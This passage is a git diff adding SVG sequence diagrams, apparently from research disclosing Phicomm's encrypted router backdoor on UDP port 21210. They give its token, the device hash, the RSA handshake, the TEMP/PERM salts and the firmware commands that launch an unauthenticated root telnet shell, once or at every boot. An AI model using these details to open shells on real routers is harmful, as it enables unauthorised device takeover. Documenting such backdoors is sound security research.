xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1408.9848938459027" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1428.5348930829632" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1236.4348946088421" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1287.3015594953167" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1327.8848915570843" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1422.1682243817913" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1087.6848946088421" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1137.6682281964886" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1307.0182343000042" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1395.1515655988323" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1214.0182228559124" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1388.6348915570843" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1097.9348946088421" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.4015541547406" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 969.8196703766807 3231.3419580190002 L 1055.2653491766807 3231.3419580190002 L 1055.2653491766807 3259.1118036290004 L 987.407239263014 3259.1118036290004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(969.8196703766807,3259.1118036290004) translate(-969.8196703766807,-3259.1118036290004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 987.620853460014 3250.211212087334 L 969.8196703766807 3259.1118036290004 L 987.620853460014 3268.012395170667 Z"/></g></g></g><g/><g/></g></svg>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_protocol.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_protocol.svg
new file mode 100644
index 0000000..02ce455
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_protocol.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1111" height="1991"><desc>title%20Phicomm's%20Encrypted%20Backdoor%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnIt%20seems%20that%20the%20Client%20is%20expected%20to%20encrypt%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnwith%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%20that%20corresponds%20to%20the%20%3Ccolor%3A%23darkblue%3E**PUBLIC%5CnKEY**%3C%2Fcolor%3E%20hardcoded%20on%20the%20device.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3A**If**%20the%20Client%20possesses%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%2C%20or%2C%5Cnperhaps%2C%20a%20database%20of%20such%20keys%2C%20each%5Cnindexed%20by%20an%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%2C%5Cnthen%20they%20may%20now%20proceed%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20and%20store%20%20the%20result%5Cnas%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn(Note%20the%20format%20string.)%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsalts%20to%20%3Ccolor%3A%23blue%3Exor(XOR_MASK,SECRET_PLAINTEXT)%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1111" height="1991"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="16.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="273.8413135509609" y="22.6179738" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Phicomm's Encrypted Backdoor on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 88.511670804 L 45.149658982 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 88.511670804 L 552.1357946608085 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 7.5393246000000005 47.799317964000004 L 82.759993364 47.799317964000004 L 82.759993364 88.511670804 L 7.5393246000000005 88.511670804 L 7.5393246000000005 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="23.899658982" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 511.7087927220458 47.799317964000004 L 592.5627965995712 47.799317964000004 L 592.5627965995712 88.511670804 L 511.7087927220458 88.511670804 L 511.7087927220458 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="528.0691271040458" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 37.610334382 96.050995404 L 52.688983582 96.050995404 L 52.688983582 1976.3585506440002 L 37.610334382 1976.3585506440002 L 37.610334382 96.050995404" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 544.5964700608085 168.42851156400002 L 559.6751192608085 168.42851156400002 L 559.6751192608085 1976.3585506440002 L 544.5964700608085 1976.3585506440002 L 544.5964700608085 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 290.565570084 L 567.2144438608085 290.565570084 L 567.2144438608085 362.943086244 L 552.1357946608085 362.943086244 L 552.1357946608085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 545.394741564 L 60.228308182 545.394741564 L 60.228308182 1976.3585506440002 L 45.149658982 1976.3585506440002 L 45.149658982 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 664.516070244 L 567.2144438608085 664.516070244 L 567.2144438608085 1976.3585506440002 L 552.1357946608085 1976.3585506440002 L 552.1357946608085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 756.4958303640001 L 574.7537684608085 756.4958303640001 L 574.7537684608085 1976.3585506440002 L 559.6751192608085 1976.3585506440002 L 559.6751192608085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 878.6328888840001 L 582.2930930608085 878.6328888840001 L 582.2930930608085 1976.3585506440002 L 567.2144438608085 1976.3585506440002 L 567.2144438608085 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 920.853106644 L 67.76763278199999 920.853106644 L 67.76763278199999 1976.3585506440002 L 52.688983582 1976.3585506440002 L 52.688983582 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 60.22830818199999 1150.048574484 L 75.306957382 1150.048574484 L 75.306957382 1976.3585506440002 L 60.22830818199999 1976.3585506440002 L 60.22830818199999 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608086 1287.264282204 L 589.8324176608086 1287.264282204 L 589.8324176608086 1976.3585506440002 L 574.7537684608086 1976.3585506440002 L 574.7537684608086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 67.767632782 1591.852996044 L 82.84628198200001 1591.852996044 L 82.84628198200001 1976.3585506440002 L 67.767632782 1976.3585506440002 L 67.767632782 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 75.306957382 1668.7541069640001 L 90.385606582 1668.7541069640001 L 90.385606582 1976.3585506440002 L 75.306957382 1976.3585506440002 L 75.306957382 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1710.974324724 L 597.3717422608086 1710.974324724 L 597.3717422608086 1976.3585506440002 L 582.2930930608086 1976.3585506440002 L 582.2930930608086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="177.34759304041856" y="118.668969204" width="230.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="133.747618404" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="148.826267604" width="242.59026756197144" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="302.4427262968834" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.85939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="147.318402684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="225.2927247710045" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="411.9593965239342" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 168.42851156400002 L 532.1817155528086 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(544.5964700608085,168.42851156400002) translate(-544.5964700608085,-168.42851156400002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 162.14574106400002 L 544.5964700608085 168.42851156400002 L 532.0309290608085 174.71128206400002 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="191.046485364" width="285.17358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="206.125134564" width="321.0736054411523" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="221.203783764" width="254.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="236.282432964" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="251.361082164" width="348.04025735765623" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="204.617269644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="707.5859796878593" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.1193201419609" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="234.774568044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="249.853217244" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="727.035969006707" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 270.963326124 L 627.5290406608085 270.963326124 L 627.5290406608085 290.565570084 L 579.6291983688085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,290.565570084) translate(-567.2144438608085,-290.565570084)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 284.282799584 L 567.2144438608085 290.565570084 L 579.7799848608086 296.848340584 Z"/></g></g><g><g><rect fill="white" stroke="none" x="123.35058511336776" y="313.183543884" width="322.8569330206506" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="328.26219308400005" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="343.340842284" width="358.123608016073" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="235.47905119453964" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="439.27905424629745" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="341.83297736400004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.2957168439537" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="473.49572905098495" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 362.943086244 L 65.10373809000001 362.943086244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(52.688983582,362.943086244) translate(-52.688983582,-362.943086244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 65.254524582 356.660315744 L 52.688983582 362.943086244 L 65.254524582 369.22585674400005 Z"/></g></g><g><g><rect fill="white" stroke="none" x="78.071376402" y="385.561060044" width="378.9402741423242" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="400.63970924399996" width="425.7402490606897" height="19.602243960000003"/></g><g><rect fill="white" 